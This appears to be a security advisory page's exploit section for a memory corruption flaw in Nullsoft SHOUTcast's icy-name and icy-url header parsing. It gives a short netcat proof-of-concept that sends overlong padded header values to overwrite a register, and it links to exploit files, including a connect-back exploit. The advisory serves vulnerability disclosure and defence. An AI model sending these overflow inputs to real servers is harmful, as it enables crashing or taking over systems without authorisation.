• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Nullsoft SHOUTcast icy-name/icy-url Memory Corruption Vulnerability

The following proof-of-concept example was provided:

>nc target 8001
changeme
icy-name:AAA...[Ax275]BBBB[rewrite EAX]
icy-genre:DoS radio
icy-url:AAA...[Ax288]BBBB[rewrite EAX]
icy-pub:1
icy-irc:N/A
icy-icq:N/A
icy-aim:N/A
icy-br:160

---
A proof of concept exploit has been made available. It should be noted that Symantec has not verified the integrity of this file. The proof of concept is available at the following location:
http://www.securitylab.ru/_tools/shoutdown.01.tar.gz

exworm of oseen has provided the following connect back exploit, oseen_shoucast.c.

The following exploit code has been provided:

• /data/vulnerabilities/exploits/shoutexp.py
• /data/vulnerabilities/exploits/oseen_shoucast.c